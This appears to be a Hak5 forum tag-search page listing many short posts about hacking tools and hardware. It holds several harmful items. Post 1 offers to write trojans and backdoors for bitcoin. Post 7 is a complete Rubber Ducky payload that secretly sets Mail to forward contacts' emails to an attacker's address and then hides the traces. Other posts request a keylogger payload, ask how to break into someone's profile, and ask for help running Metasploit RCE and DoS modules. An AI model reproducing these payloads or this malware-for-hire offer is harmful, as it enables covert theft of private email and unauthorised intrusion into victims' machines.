Jump to content

Search the Community

Showing results for tags 'hack'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. I am not sure if this is the right bored to be talking about this I am willing to code Trojans,Viruses,Bots and any other type of malware in exchange for bitcoins. It could do just about anything you want example: Backdoor a system, Destroy the entire computer, Delete files, Record video and audio, etc pm me if your interested
  2. Hello, so i recently got challenged by my friend to beat him on something called readtheory and i kinda saw him cheat thru some code or something so i wonder if any of you guys know how to find answers in codes. there is multiple answers and i want to know how to find the correct one. Pls helperino <3 :D
  3. Hi everybody! im trying to use wordpress long password dos auxiliary in metasploit ... but it keeps getting some bad ass error about a month ago i was still using ubuntu and this module was working so god ... but since i moved in to kali im having trouble with it [Forgive me for my fucked up english] these are the error(s): [*] Checking if user "admin" exists... [+] Username "admin" is valid [-] Auxiliary failed: ActiveRecord::StatementInvalid PG::InvalidTextRepresentation: ERROR: invalid input syntax for type inet: "myhost(that i set for rhost)" : SELECT "hosts".* FROM "hosts" WHERE "hosts"."address" = $1 AND "hosts"."workspace_id" = $2 ORDER BY "hosts"."id" ASC LIMIT 1 [-] Call stack: [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `exec_prepared' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `block in exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `block in log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport- `instrument' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `execute_and_clear' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `exec_query' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `select' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `find_by_sql' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `exec_queries' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `load' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `to_a' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `find_nth_with_limit' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `find_nth' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `first' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord- `first_or_create' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:555:in `create_credential_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:423:in `create_credential_origin_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:353:in `create_credential_origin' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:117:in `create_credential' [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:88:in `report_cred' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:100:in `user_exists' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:119:in `run' [*] Auxiliary module execution completed
  4. HI, So my friend is a dumb dumb and has forgotten his password to his windows home pc. I've been looking for programs that can be installed to a USB that you can boot through to either reset or bypass the password all together and so far im not convinced. The whole thing seems too easy to me and im worried about it being a scam to steal data or something worse. My question is: Is there such a program that works and if so what are your recommendations that wont put malware onto my or his computer? Many thanks -Lupus
  5. Dirty hack in the interface (Configuration module) to select a country code, to re-assert the correct channels and frequencies for your currently occupied country. I noticed the team have patched the Network panel to dynamically display the channel array in a nice dropdown box. I assume you already know linux and how to patch code, or can take this patch and make your own modifications; standard disclaimer: use at you own risk, simples! diff -Npaur pineapple/modules/Configuration/api/module.php pineapple-new/modules/Configuration/api/module.php --- pineapple/modules/Configuration/api/module.php 2016-09-15 13:57:11.000000000 +0100 +++ pineapple-new/modules/Configuration/api/module.php 2016-09-15 13:55:39.000000000 +0100 @@ -49,6 +49,13 @@ class Configuration extends SystemModule $this->disableLandingPage(); break; + case 'changeRegion': + $this->changeRegion(); + break; + + case 'getCurrentRegion': + $this->getCurrentRegion(); + break; } } @@ -135,4 +142,16 @@ class Configuration extends SystemModule $this->response = array("success" => false); } + private function getCurrentRegion() + { + $currentRegion = exec('iw reg get|head -n 2|tail -n 1|cut -b 9-10'); + $this->response = array("currentRegion" => $currentRegion); + } + + private function changeRegion() + { + $region = escapeshellarg($this->request->Region); + exec("iw reg set {$region}"); + $this->response = array("success" => true); + } } diff -Npaur pineapple/modules/Configuration/js/module.js pineapple-new/modules/Configuration/js/module.js --- pineapple/modules/Configuration/js/module.js 2016-09-15 13:55:39.000000000 +0100 +++ pineapple-new/modules/Configuration/js/module.js 2016-09-15 13:55:39.000000000 +0100 @@ -7,6 +7,8 @@ registerController("ConfigurationGeneral $scope.newPasswordRepeat = ""; $scope.showPasswordSuccess = false; $scope.showPasswordError = false; + $scope.customRegion=""; + $scope.currentRegion=""; $scope.timeZones = [ { value: 'GMT+12', description: "(GMT-12:00) Eniwetok, Kwajalein" }, @@ -36,6 +38,15 @@ registerController("ConfigurationGeneral { value: 'GMT-12', description: "(GMT+12) Auckland, Wellington, Fiji, Kamchatka" } ]; + $scope.getCurrentRegion = (function() { + $api.request({ + module: "Configuration", + action: "getCurrentRegion" + }, function(response) { + $scope.currentRegion = response.currentRegion; + }); + }); + $scope.getCurrentTimeZone = (function() { $api.request({ @@ -137,6 +148,25 @@ registerController("ConfigurationGeneral }); }); + $scope.changeRegion = (function() { + var tmpRegion; + if ($scope.customRegion.trim() !== "") { + tmpRegion = $scope.customRegion; + } + $api.request({ + module: "Configuration", + action: "changeRegion", + Region: tmpRegion, + + }, function(response) { + if (response.success !== undefined) { + $scope.getCurrentRegion(); + $scope.customRegion="00"; + } + }); + }); + + $scope.getCurrentRegion(); $scope.getCurrentTimeZone(); }]); @@ -195,4 +225,4 @@ registerController('ConfigurationLanding }); $scope.getLandingPageStatus(); -}]); \ No newline at end of file +}]); diff -Npaur pineapple/modules/Configuration/module.html pineapple-new/modules/Configuration/module.html --- pineapple/modules/Configuration/module.html 2016-09-15 13:55:39.000000000 +0100 +++ pineapple-new/modules/Configuration/module.html 2016-09-15 13:55:39.000000000 +0100 @@ -43,7 +43,23 @@ </div> </div> </form> - + <br/> + <form class="form-horizontal"> + <div class="form-group"> + <label class="col-sm-2 control-label">Region:</label> + <div class="col-sm-3"> + <input type="text" class="form-control" ng-model="currentRegion" disabled> + </div></div> + <div class="form-group"> + <label for="Region" class="col-sm-2 control-label">Region Code</label> + <div class="col-sm-5"> + <input type="text" class="form-control" placeholder="00" ng-model="customRegion"> + </div></div> + <div class="form-group"> + <div class="col-sm-offset-2 col-sm-10"> + <button type="submit" class="btn btn-default" ng-click="changeRegion()">Change Region</button> + </div></div> + </form> <br/> <br/> @@ -101,4 +117,4 @@ </div> </div> </div> -</div> \ No newline at end of file +</div>
  6. Is it possible to create an ios app payload, like we do using metasploit to hack an android phone using reverst tcp method by creating a payload.apk?
  7. This payload has been tested on the latest version of OS X El Capitan. It Opens applescript and types in some codes that tells mail to forward all email's from people who are in the users contact to your own private email address. It then deletes the applescript code and opens terminal to quit applescript and terminal. You might want to mess with the delay DELAY 1500 GUI SPACE DELAY 300 STRING script editor DELAY 200 ENTER DELAY 500 GUI n DELAY 500 STRING tell application "Mail" STRING set newRule to make new rule at end of rules with properties {name:"apple mail", enabled:true, forward message:"Your email address"} STRING tell newRule STRING make new rule condition at end of rule conditions with properties {rule type:sender is in my contacts} STRING end tell STRING end tell GUI R DELAY 600 GUI A STRING . GUI SPACE DELY 300 STRING Terminal DELAY 300 ENTER DELAY 500 STRING killall Script\ Editor DELAY 200 STRING killall Termianl Applescript Email Forward
  8. Hy guys, i'm a newbie and this is my first post, I just need someone to teach me where to beggin hacking and stuff Thanx :)
  9. So I'm in high school and I've been researching and thinking about taking the oscp course. I know it's one of the most grueling certification courses, but I do have quite a bit of knowledge about hacking. I was wondering if anyone knew any sort of prior knowledge I should have specifically or maybe any other certifications that I should complete before hand. Any advice would be great, considering that most people who take this exam are much older than I am. Thanks!
  10. Hey all, The Tetra allows us to do so many great things. We can spoof the SSID and make a Client think they are connecting to a "known" AP. The Client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the Client sends? I have a feeling the issue has to do with hashing done at each sides of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyones input and teaching my like i'm 5 If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with Wifi.
  11. I'd like to change the game length from 5 points for a win to 11 points for a win. I'd like to run the game at full screen rather tahn windowed. You can download the game at https://www.sendspace.com/file/2agu4q Any help greatly appreciated.
  12. I am trying to exploit the common joomla CMS application. Here is some info on the exploit. https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce To use the exploit in msfconsole type : use exploit/multi/http/joomla_http_header_rce So here comes my question. In the options for the exploit comes my problem show options ​###output below### Name Current Setting Required Description ---- --------------- -------- ----------- HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the Joomla application VHOST no HTTP server virtual host My problem is the VHOST setting.I do under stand what virtual host is( I think it is when one ip is used to host multiple domain names) Imagine this scenario: target website running joomla is http://www.joomla-target.com/joomla/ on port 80 domain is hosted on but is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding) I hope you have understood the scenario: So what will be the options for RHOST TARGETURI VHOST RPORT Please help. Thanks in advance.
  13. Hello everybody My usb rubber ducky arrives in a few days and i have another bunch of questions: 1. It comes with micro SD card, doesn´t it? How much is it capability? (2, 4, 8 GB?) 2. Does it came with pre-installed firmware? 3. Does java version matter when building payloads? 4. Does exists any noob-proof tutorial? you know Thanks in advance!
  14. Hello Everybody! I introduce myself, I am new into the forum. I am just going to order my ducky in the few days but I have some questions. 1. The only avaiable ducky model at now is the deluxe one? 2. What is Twin Ducky? A mod for a normal (or deluxe) ducky? 3. Where are the scripts stored, micro SD card? Can I store files into the same micro SD (Twin Ducky is something like that i believe) 5. How is the support for Spanish keyboards? Official? Is it nice? 4. What is ducky encoder? Is it like a firmware for our duckys? Can I update it´s firmware? Thanks in advance everybody! PD: Do you know any HakShop disscount code, don´t you? haha :P
  15. https://youtu.be/X3xIit1UK3E so i have got into these things at AppleBee's and now Johnny Rockets. At AppleBee's i was able to get the IP address for the server unit. Also you can enter Demo mode and play the games for free. Wonder if anyone has seen these and have you guys done anything to them yet.
  16. So i was wondering if anyone has tried this or knows how to? -------------------------------- PS4 Bluetooth Pass Through a Computer for the PS4 Controller for Custom 'Configs & Auto Commands' to send back to the PS4 System and looks as if it was the normal controller connected not the PC Bluetooth or, if plugged in the controller Bluetooth output to the PS4. PS: Sorry if this doesn't make sense to you, if you have questions on what i posted please reply and I'll answer the best i can. Thanks Also those who know me sorry i haven't been on in a long time.. Still using all my products $300+ best money spent on online products.. "Sneaky Sneaky" Note: I'm not a Cheater, simply don't have time to Farm XP Points because of work, ETC.
  17. Is there any way for me to inject a payload into the duck that records keystrokes automatically, or at least run a software that i made, a keylogger, automatically upon insertion? If there is can you give the codes? Thank you.
  18. Ever wanted to know whats inside all of those saved bins? forgot what your payload did and is too risky to try? check out my python scrip to decode them at: https://github.com/JPaulMora/Duck-Decoder help is much appreciated! need support for non-english keyboards. run it without args for help. Fully tested & working on OS X 10.10.3
  19. I was wondering what you guys carried in your hack pack / urban survival bag / pen testing bag. To begin, I will start J :) I have a growing collection but here is mine: - 1x Wifi Pineapple MK5 - 1x Pineapple Juice 12800mah - 2x 8dbi omni antennas - 1x 12dbi yagi antenna - 1x r00tabagga - 1x Reaver Pro 2 - 1x 24 pcs lockpick set - 1x 20800mah samsung battery (really dodgy) - 1x Alfa card AWUS36NH - 1x Targus water resistant backpack - 1x UTTD tool - 1x assorted boot disks - 1x Assorted memory mediums, cables and antennas Separate bigger items: - Trek X-Calibre 7 - 24 dbi parabolic grid antenna - Working suite Drones - AR Parrot Drone 2.0 - Building Tarrot T1000 drone I might have forgotten some things but I think that this is a comprehensive list. I might be able to get some photo’s later tonight.
  20. So basically I am new to the forum here and before visiting this, through search terms 'DDOS' (Because of LizardSquad), I thought I was pretty good in Hacking.. Well Not really, I don't even know the basics of hacking and I am quite interested in learning. Hopefully if you guys help me I might get better and yeah.. I'd like to start off with a question. How can I hack into a profile? Not through Phishing though.. I know you guys will get angry and call me a Noob or something but yeah I stated I am not very good at it that's why I am here to learn. Thanks
  21. I created a tutorial on how to get a remote shell on any windows PC in 5 seconds using RubberDucky... enjoy! https://crowdshield.com/blog/2015/pwn-any-windows-pc-in-5-seconds-with-badusb.php
  22. how to create forums website? with protecting me ?i mean that forum must not be hacked.
  23. Hello everyone, im trying to understand why this payload doesn't work. ------------ Every time it says: "The system can not find the specified path", when it tries to start the batchfile. Hope you guys can help me because it is making me going stupid. :D Thank you! ((P.S Excuse my english, im from germany))
  24. Merry xmass to all readers !!! After reading a lot of stuff about Mark V i finally got it but as all manuals related to mark IV im really stuck.. For example : http://hak5.org/hack/pineapple-phishing Can anyone explain what do i need to change to make it working on Mark V ? Thanks
  25. Hello, I'm trying to teach myself John the ripper and hashcat, I cant crack this at all. Tried 40 different wordlists (totaling 120GB), 20 different types hashes. What am I doing wrong. I want someone to tell me how to properly crack this stuff, I don't want a simple hand out. The tutorials online and hash-cat site are not yielding any results. When I use hash id it says SHA-1.So I've done that and a number of other ones. I wonder if my wordlist. Can anyone help. Example set: d9081cc033ac2c19afe3ff8cf453946c12448422 f47f25c081e912826f3e14c1096e38d1f4dd2b43 afdc1c9439966fd0a314ee237c7338e871f59d7d ea4a493b6dd029de9f014848b68d7a55fad95437 2b62c635f72be4242fff4b1717504e5c7df80b3b ed879ab939c2d4e4afdf24f09f8946f2509366de f7a5d996f8221f4c5080f5326a915ce0a9b2d6e1 ef23bcefbc3cfe63d3bff54d9d606d3d2e4eea32 0febac796bfc2f86c74cc1c0875add0fe4e1c670 d1a0c716884144c47937a6fbee49390ac8fb33d1 Thanks
  • Create New...